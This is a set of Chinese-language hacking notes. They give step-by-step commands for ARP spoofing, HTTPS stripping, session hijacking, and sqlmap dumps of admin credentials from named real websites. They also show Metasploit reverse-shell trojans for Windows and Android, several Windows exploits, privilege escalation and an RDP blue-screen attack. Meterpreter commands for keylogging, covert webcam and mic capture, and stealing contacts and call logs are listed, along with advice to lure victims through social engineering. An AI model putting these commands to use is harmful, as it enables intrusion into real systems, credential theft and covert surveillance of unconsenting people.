端口掃描
nmap -sS 目標ip
Arp 內網斷網
Arpspoof -i 網卡 -t 目標ip 網關
獲取網卡/網關
ifconfig
獲取內網ip
fping -asg 192.168.1.0/24
Arp 欺騙
echo 寫命令,是不會有回顯的
ehco 1 >proc/sys/net/ipv4/ip_forward
# 進行IP流量轉發
目標 --》 我的網卡 --》網關
driftnet --> 獲取本機網卡的圖片
driftnet -i eth0 獲取本機網卡的圖片
ifconfig #查看網絡信息
iwconfig #查看網卡信息
kali中查找程序或命令
ex:sqlmap
find / -name sqlmap
find / -name ettercap
+++++++++++++++++++++++++++++++++
HTTP 帳號密碼獲取
Arpspoof --> 欺騙
Ettercap --> 欺騙 DNS欺騙 流量 嗅探
實戰前的信息采集:
目標機器: 目標ip,網關
攻擊機器: kali ip
arpspoof -i eth0 -t 目標ip 網關
開啟ip轉發
echo 1 >/proc/sys/net/ipv4/ip_forward
cat 查看內容
cat /proc/sys/net/ipv4/ip_forward
啟動ettercap進行流量嗅探
ettercap -Tq -i eth0
-Tq --> -T: 啟動文本模式,q:安靜模式;
-i --> i: 網關;
url解碼:www.convertstring.com
+++++++++++++++++++++++++++++++++++++++
HTTPS 賬戶密碼獲取
vim /etc/ettercap/etter.conf
修改iptables規則
去掉注釋符號
保存推出
sslstrip --》 可以把HTTPS還原為http
arpspoof -i eth0 -t 目標ip 網關
開啟ip轉發
echo 1 >/proc/sys/net/ipv4/ip_forward
ettercap -Tq -i eth0
sslstrip -a -f -k
缺點:容易出現證書錯誤!
+++++++++++++++++++++++++++++++++++++++++
會話劫持
需要的工具
Arpspoof ==> Arp欺騙
Wireshark ==> 抓包
ferret ==> 重新生成抓包后的文件
hamster ==> 重放流量
#trip1:基於arp欺騙
arpspoof
arpspoof -i eth0 -t 目標ip 網關
echo 1 >/proc/sys/net/ipv4/ip_forward
start Wireshark #開始抓包
ferret -r cockie.pcap #生成hamster.txt
#trip2:基於ferret
ferret -1 eth0
hamster
#trip3:基於CookieCadger.jar一鍵劫持
install CookieCadger
選擇網卡
動態截取流量
++++++++++++++++++++++++++++++++++++++++
SqlMap
asp 網站,大多用的Access 文件 數據庫 MSSQL數據庫
數據庫
表
字段(列)
sqlmap -u http://www.baidu.com
-u 檢測是否存在注入
成功,返回數據庫信息
sqlmap -u www.baidu.com --tables
暴力猜解所有表名(有點慢)
sqlmap -u http://www.baidu.com --columns -T "user"
--columns 猜列名 根據user
sqlmap -u "http://www.baidu.com" --dump -C "username,password" -T "user"
--dump 下載數據 -C "username,password"列名
php 網站, 大多用Mysql
sqlmap -u "http://www.ggec.com.cn/oneNews.php?id=69" --is-dba
back-end DBMS:MySQL >= 5.0.0
sqlmap -u "http://www.ggec.com.cn/oneNews.php?id=69" --dbs
列出所有數據庫
sqlmap -u "http://www.ggec.com.cn/oneNews.php?id=69" --current-db
查找自己的數據庫
sqlmap -u "http://www.ggec.com.cn/oneNews.php?id=69" --tables -D "ggec"
猜解(查詢)所有表名 根據 ggec
sqlmap -u "http://www.ggec.com.cn/oneNews.php?id=69" --columns -T "ggec_admin" -D "ggec"
查詢 所有的列
sqlmap -u "http://www.ggec.com.cn/oneNews.php?id=69" --dump -C "username,password" -T "ggec_admin" -D "ggec"
查詢列的字段
www.cmd5.com md5在線加解密站點
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
sqlmap cookie注入
sqlmap -u "http://www.wisefund.com.cn/about.asp" --cookie "id=56" --level 2
--cookie "" 這里寫id的參數,如果是cookie注入,就要把等級提升為level 2
sqlmap -u "http://www.wisefund.com.cn/about.asp" --tables --cookie "id=56" --level 2
sqlmap -u "http://www.wisefund.com.cn/about.asp" --columns -T "user" --cookie "id=56" --level 2
sqlmap -u "http://www.wisefund.com.cn/about.asp" --dump -C "username,password" -T "user" --cookie "id=56" --level 2
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Metasploit 基礎
Exploit 模塊 -- 》 漏洞利用
Payloads -- 》 shellCode
use exploit/windows/smb/ms08_067_netapi
選擇漏洞利用模塊
show options
查看要填入的參數
set RHOST 192.168.1,100
set PAYLOAD window/meterpreter/reverse_tcp
RHOST --> 目標IP
LHOST --> 本機IP
exploit --》 執行操作
實施攻擊成功則反饋
msfconsole 從終端啟動metasploit
background
sessions -i number
木馬 :控制端 服務端
控制遠程 木馬程序
a.根據自己的IP生成一個馬
我的IP 192.168.1.103 55555
msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.103 LPORT=55555
X> test.exe
這么下來,就會生成一個test.exe的木馬程序
b. use exploit/multi/handler
使用handler這個模塊
set PAYLOAD windows/meterpreter/reverse_tcp
使用這個shellcode
LHOST = 192.168.1.103
LRORT = 55555
這里填寫 生成木馬的IP和端口
c. 先執行msf,再執行馬
木馬的使用
注入進程:木馬隨時有可能被結束掉的
ps: 得到我們要注入的PID進程
2036 2004 explorer.exe 桌面進程
migrate 2036 #注入進程
遠程桌面的開啟:
Run vnc 開啟遠程桌面
文件管理功能
Downlaod 下載文件
Edit 編輯文件
Cat 查看文件
mkdir 創建文件
Mv 移動文件
Rm 刪除文件
Upload 上傳文件
Rmdir 刪除文件夾
查看PHP文件: cat hack.php
下載文件: download hack.php
刪除文件: rm hack.php
上傳文件: upload hack.php
網絡及系統操作
Arp 查看ARP緩沖表
Ifconfig 查看IP地址網卡
Getproxy 獲取代理
Netstat 查看端口鏈接
kill 殺死進程
ps 查看進程
reboot 重啟機器
reg 修改注冊表
shell 獲取shell
shutdown 關機
sysinfo 獲取電腦信息
用戶操作和其他功能講解
enumdesktops 窗體
keyscan_dump 鍵盤記錄 -- 下載
keyscan_start 鍵盤記錄 -- 開始
keyscan_stop 鍵盤記錄 -- 停止
Uict1 獲取鍵盤鼠標控
uictl disable keyboard/mouse 禁用鍵盤/鼠標
uictl enable keyboard/mouse 啟用鍵盤/鼠標制權
record_mic 音頻錄制
record_mic -d 10 后台錄音10秒
webcam_chat 查看攝像頭接口
webcam_list 查看攝像頭列表
webcam_stream 攝像頭視頻獲取
GetSystem 獲取高權限
Hashdump 下載hash
++++++++++++++++++++++++++++++++++++++++++++++++++
Metasploit Androd實戰筆記
Msfpayload android/meterpreter/reverse_tcp LHOST=192.168.1.103 LPROT=55555
R > test.apk
Search 搜索 jpg,png,bmp
Download 下載 jpg,png,bmp
webcam_snap 手機截屏
webcam_stream -i [1:2?] 手機攝像頭監控
check_root 檢測Root
dump_calllog 下載電話記錄
dump_contacts 下載信息記錄
Geolocate 定位
+++++++++++++++++++++++++++++++++++++++++++++++
Metasploit服務器藍屏攻擊
DDos
服務器開啟 3389
確定目標: 192.168.1.103
MS12 020
auxiliary/dos/windows/rdp/ms12_020_maxchannelids
服務器遠程桌面的一個可用模塊
auxiliary/scanner/rdp/ms12_020_check
掃描主機是否存在漏洞
RHOST R開頭,遠程主機
auxiliary/dos/windows/rdp/ms12_020_maxchannelids
目的:比DDos來的更直接一些
Metasploit生成webshell
a.在msf中生成一個PHP腳本
msfpayload php/meterpreter/reverse_tcp LHOST=192.168.1.101 R > web.php
生成一個PHP腳本
cat 查看文件內容
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
MS---------
先在kali上制作一個后門程序。文件名為:openme.exe
命令:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.10.128 LPORT=50000 -f exe -o openme.exe
#本地監聽地址及端口號:10.10.10.128:50000
為生成的文件 openme.exe 賦予可執行的權限,如果有必要可以對該文件執行免殺
命令:
chmod 777 openme.exe
打開msf,加載exploit/multi/handler模塊,同時設置本地主機地址,本地端口
命令:
msfconsole
msf > use exploit/multi/handler
msf exploit(handler) > set lhost 10.10.10.128
msf exploit(handler) > set lport 50000
開始執行滲透攻擊並監聽
命令:
msf exploit(handler) > exploit -z -j
此時,你可以將文件發給其他人,利用社會工程學知識讓別人在他的win7系統上打開該文件,那么你的目的就達到了
下面就是我在win7虛擬機中的文件,然后運行該文件
后門程序反向連接到msf,msf發起第二次攻擊(開始滲透),然后客戶端(后門程序)連接到服務端(msf)。
如圖你在你kali上會有一個session。你攻陷了別人的主機並拿到了shell,還有session信息。
命令:
msf exploit(handler) > sessions
msf exploit(handler) > sessions -i 1
meterpreter > shell
最后恭喜你就這樣hacked別人的win7系統,如果你進一步學習Windows系統下的命令行操作,你就可以隨意控制別人的主機了。
下面附上meterpreter常用的命令
getsystem #會自動利用各種各樣的系統漏洞來進行權限提升
migrate #進程id進程遷移
background #把當前的會話設置為背景,需要的時候在啟用
getuid #查看對方正在運行的用戶
ps #列出所有的進程
getpid #返回運行meterpreter的id號
sysinfo #產看系統信息和體系結構
shell #切換到cmd的系統權限方式
exit #退出shell會話返回meterpreter或終止meterpreter
getdesktop截取目標主機當前桌面會話窗口
run webcam -p /var/www #在/var/www目錄監控目標主機的攝像頭
keylog_recorder #使用migrate將會話遷移至explorer.exe的進程空間后記錄鍵盤
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Microsoft Windows OLE遠程代碼執行漏洞,OLE(對象鏈接與嵌入)是一種允許應用程序共享數據和功能的技術,
遠程攻擊者利用此漏洞通過構造的網站執行任意代碼,影響Win95+IE3 – Win10+IE11全版本...
metasploit里已經加入了此漏洞的利用模塊 :exploit/windows/browser/ms14_064_ole_code_execution
執行命令:
msfconsole //啟動MSF
search ms14 //搜索關鍵字
use exploit/windows/browser/ms14_064_ole_code_execution // 加載漏洞利用模塊
set payload windows/meterpreter/reverse_tcp //設置反彈連接shell
如圖:
需要注意的是箭頭標記的屬性默認為false 需要設置為true ,因為msf中自帶的漏洞利用exp調用的是 powershell,
所以msf(Metasploit Framework)中的exp代碼只對安裝powershell的系統生效。win7系統安裝自帶powershell,
所以我們這里測試受害的機器為windows7 32位.
按照圖中各個屬性配置好后 執行exploit即可
到一個URL地址,復制到受害者機器(win7)測試
當用戶點擊允許了后
可以看見這邊反彈了一個shell,接下里我們就可以隨便玩了,
測試成功,結束。
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
在WEB滲透中當我們拿到webshell了,我們可以試試用MSF(metasploit)來進行提權,在MSF里meterpreter很強大的!
我們先用msfvenom生成一個EXE的木馬后門。
msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 5 -b '\x00' LHOST=192.168.1.7 LPORT=4444 -f exe > abc.exe
然后在到MSF根據剛才配置的木馬后門進行監聽...
然后在把木馬上傳到服務器(受害者)的機器里,必須上傳到可讀可寫的目錄下哦,
比如這里我吧abc.exe上傳到了C:\users\leak\desktop\目錄下,
abc.exe就是我剛才生成的后門。
然后在執行我們的后門,可以看見MSF彈回了一個session 1(會話連接)。
說明我們后門程序成功執行起來了,當然你也可以在webshell執行的,
但必須的有一點執行的權限哦。
getuid //可以看見我們的權限很低的,一般都是user權限的,但也遇到過某些服務器執行后就直接是system最高權限。像這種我們就直接加用戶啦。
這里我們是user權限,我們要把它提升到system權限。Windows最高權限。
接着我們輸入命令
background //把你當前的metasploit shell轉為后台執行。
search ms16 // 搜索關鍵字相關的漏洞
.....然后我選擇了MS16-016這個漏洞在進行提權
use exploit/windows/local/ms16_016_webdav // 選擇漏洞
show options //查看漏洞里邊要設置的參數
可以看見只有一個SESSION參數要設置
set SESSION 1 // 設置會剛才我們后門連接的ID號 1
exploit //執行提權...
可以看見成功的吧漏洞利用到了PID為692的進程中...
雖然提權成功了 但你getuid下還是看見的是user權限
ps一下查看進程
根據剛才的提示找到PID 692的進程
可以看見確實是system權限
所以我們還要用到migrate 命令 //遷移到一個指定的進程ID。
migrate 692 //
在getuid下可以看見為system權限啦
提權成功了
既然有了system權限 那我們在添加賬號hack
添加為管理員組
用Nmap掃下並沒有開啟遠程登陸3389
run getgui -e //開啟目標主機3389 貌似這條MSF命令只對2003的系統有效 執行幾次都沒成功
所以就用cmd命令開了3389端口
提權成功,登錄服務器。。。。
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
名稱:Microsoft DLL植入遠程代碼執行漏洞(CVE-2015-0096)(MS15-020)
了解:Microsoft Windows沒有正確處理DLL文件的加載,存在遠程代碼執行漏洞,通過誘使用戶打開遠程WebDAV或SMB共享上的某些文件利用此漏洞,
成功利用后可導致加載任意庫。Windows使用.lnk來定義文件或者目錄的快捷方式,可以使用.CPL文件來自定義圖標。問題是,在Windows中,圖標從模塊(或者可執行文件或動態鏈接庫)加載。
事實上,.cpl文件實際上是DLL文件。因為攻擊者可以定義哪些可執行模塊會被加載,攻擊者可以利用.LNK文件來執行任意代碼。
實驗環境:
共享主機win7:192.168.1.3
入侵主機linux:192.168.1.7
受害者主機XP:192.168.10
打開終端輸入命令:
msfconsole //啟動msf(metasploit framework)
search ms15 //搜索關鍵字相關漏洞
use exploit/windows/fileformat/ms15_020_shortcut_icon_dllloader //漏洞利用模塊
info //查看漏洞相關信息
set payload windows/meterpreter/reverse_tcp //設置一個反彈shell
設置好參數,設置漏洞利用模塊列表的UNCHOST和UNCSHARE
set UNCHOST 192.168.1.3 //我設置為我的另一台主機地址 就是你開着共享那台機器的地址
set UNCSHARE share //設置共享文件的文件夾 這里主機192.168.1.3在C盤下的share里文件夾開啟了共享 提前創建好共享
set LHOST 192.168.1.7 //設置漏洞成功利用后后門連接的地址
exploit //執行漏洞
exploit后會發現生成了幾個文件,
我們去生成的目錄下把文件拷貝到共享主機的共享文件夾下
復制到共享主機后,在啟動MSF進行配置剛才的后門進行監聽...輸入命令
1. use exploit/multi/handler
2. set payload windows/meterpreter/reverse_tcp
3. set LHOST 192.168.1.7
4. exploit
受害者訪問共享后,
成功了觸發了漏洞
可以發現入侵者這邊彈回來了一個回話session 1,簡單點說就是一個后門,這里我順便提了下權,可以看見system權限。
實驗結束,下班,關門,回家。
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
這次用到MS10-046這個遠程執行漏洞(Windows快捷方式LNK文件自動執行代碼漏洞攻擊)
命令:
1. msfconsole //啟動MSF Metasploit
2. search ms10-046 //搜索漏洞
3. use windows/browser/ms10_046_shortcut_icon_dllloader //加載漏洞模塊
4. set payload windows/meterpreter/reverse_tcp //設置一個PAYLOAD為反彈連接shell
5. show options //查看相關設置
6. set SRVHOST 192.168.1.10 //設置攻擊者自身IP
7. set LHOST 192.168.10 //設置反彈連接回來的IP (攻擊者自身IP)
8. exploit //開始執行漏洞...
會生成一個URL連接 復制這個地址 去另一台XP系統機器上測試 用瀏覽器打開會跳到共享文件夾下
然后我們在來到MSF終端看見漏洞執行成功了 有一個連接會話 ID 1
命令 :
sessions -l 查看存在的會話
sessions -i 1 選着會話1
輸入ps命令查看進程 或者 輸入run vnc 查看遠程桌面 等等
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
MS12-020遠程桌面協議RDP拒絕訪問漏洞
條件:受害者必須開放RDP協議 開放了3389端口 或者端口改了,知道對方RDP開放的對應端口。
過程:MSF利用
MSF顯示為seems down說明目標已經被攻擊。如圖已經藍屏。
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
MSF是Metasploit的簡稱,Metasploit是一款開源的安全漏洞檢測工具,非常強大,分別有Windows版和Linux版,工具里集成了許多微軟公布的漏洞(0day)。
我這里做測試的系統是Backbox linux ,這是一款網絡滲透,信息安全評估系統。里邊安裝了許許多多的工具。其中MSF就自帶有。當然還有其它的 比如Kali linux 、Back Track這些等等。
環境:Backbox linux+MSF
目標:一台安卓手機
既然是入侵安卓手機,肯定要先配置一個安卓木馬,那我們看看本機的IP
本機IP:192.168.1.6
在到終端輸入命令:msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.1.7 LPORT=5555 R > /root/apk.apk
以前的MSF老版本是用msfpayload生成木馬 現在在新版本中都用msfvenom代替了,所以有些朋友在終端輸入msfpayload的時候 會提示
msfpayload無法找到命令 所以使用msfvenom即可,這里LHOST 對應的是本機的IP地址 LPORT對應你要監聽的端口 然后生成木馬的路徑
這樣我們就在/root/路徑下生成了一個APK的安卓木馬文件,至於木馬的免殺暫且不談。現在我們在來啟動MSF工具
輸入命令:msfconsole
然后輸入:
1. use exploit/multi/handler 加載模塊
2. set payload android/meterpreter/reverse_tcp 選擇Payload
3.show options 查看參數設置
我們看見payload里邊有兩個參數要設置 LHOST和LPORT 表示地址和端口 默認的端口是4444 現在我們來更改設置
1.set LHOST 192.168.1.6 這里的地址設置成我們剛才生成木馬的IP地址
2.set LPORT 5555 這里的端口設置成剛才我們生成木馬所監聽的端口
3.exploit 開始執行漏洞 開始監聽...
OK,一切准備工作准備就緒。。。現在要做的就是把木馬文件搞到人家的手機上,思路有很多 可以DNS arp劫持欺騙 只要對方用手機下載文件 就會下載我們的木馬文件
還有社工什么等等的,這里我就簡單的把木馬文件弄我自己的手機上做測試
安裝完成后 會在桌面上生成一個MainActivity的程序圖標 這個就是我們剛才生成的木馬 當我們點擊了這個圖標 手機會沒有任何反應 其實木馬已經開始運行起來了
我們可以在我們的MSF里看見有一個會話連接了
這樣對方的手機就就被我們控制了,查看手機系統信息,輸入命令 sysinfo
webcam_list查看手機攝影頭有幾個 這里顯示兩項 分別表示有前后兩個攝像頭
webcam_snap 隱秘拍照功能
后邊跟上參數-i 指定使用那個攝像頭拍照
可以看見我們分別對前后攝像頭都拍了照 保存到了桌面上
還可以輸入命令 webcam_stream 開啟攝像頭
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++